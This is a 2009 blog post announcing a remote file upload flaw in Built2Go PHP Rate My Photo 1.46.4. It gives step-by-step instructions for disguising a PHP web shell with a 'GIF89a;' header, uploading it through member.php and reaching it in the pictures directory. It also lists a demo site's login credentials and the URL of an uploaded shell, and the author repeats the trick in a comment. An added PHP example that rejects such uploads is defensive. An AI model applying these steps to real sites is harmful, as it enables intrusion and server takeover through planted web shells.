"The Devil Is the Voice Within; Listen to That Voice"

-Zorlu BUĞRAHAN-

Saturday, 3 January 2009

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7645



Discovered By: ZoRLu

First, register on the site.

Then add this code to the head of your shell:

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_shell.php

After that, go to member.php,

select your shell.php, and your shell is here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://demos.built2go.com/rate%20my%20photo/1/

login:

http://demos.built2go.com/rate%20my%20photo/1/member.php

user: salla

pass: salla1

shell:

http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php
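
The upload above works because a file that only begins with GIF89a; is accepted and stored under pictures/ with its .php extension intact. As an added example (not code from the original post or from Built2Go), this is one way an upload handler can refuse that file; it assumes PHP 7+ with the GD and fileinfo extensions, and the function name, constant and sample file are hypothetical.

```php
<?php
// Added example, not Built2Go code. Function names, the constant and the
// sample upload below are assumptions made for illustration.

const EXT_FOR_MIME = ['image/gif' => 'gif', 'image/jpeg' => 'jpg', 'image/png' => 'png'];

// Returns the server-chosen filename to store the upload under, or null to reject.
function stored_image_name(string $tmpPath, string $clientName): ?string
{
    // 1. Allowlist the client-supplied extension; ".php" is not on the list.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif', 'jpg', 'jpeg', 'png'], true)) {
        return null;
    }
    // 2. Decode the whole file with GD. A "GIF89a;" prefix satisfies a
    //    header-only sniff, but the bytes after it are not image data.
    $data = file_get_contents($tmpPath);
    if ($data === false || $data === '' || @imagecreatefromstring($data) === false) {
        return null;
    }
    // 3. Derive the extension from the detected content type and build the
    //    name server-side, so nothing the client sent reaches the stored filename.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset(EXT_FOR_MIME[$mime])) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . EXT_FOR_MIME[$mime];
}

// Constructed sample: the file shape the advisory describes, with a placeholder body.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a;\n<?php /* placeholder body */ ?>");
var_dump(stored_image_name($tmp, 'your_shell.php')); // exercises check 1
var_dump(stored_image_name($tmp, 'your_shell.gif')); // exercises check 2
unlink($tmp);
```

Serving the upload directory with script execution disabled covers the case where a crafted file still decodes as a valid image.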

2 comments:

admin said...

Sorry, I don't understand how this works and your instructions.
I need to upload my shell as a picture?
Because I can't upload .php files or all versions are patched now.

Thanks for your time

ZoRLu said...

For your shell to work it has to have this: GIF89a; you must add it to your shell's head, example:
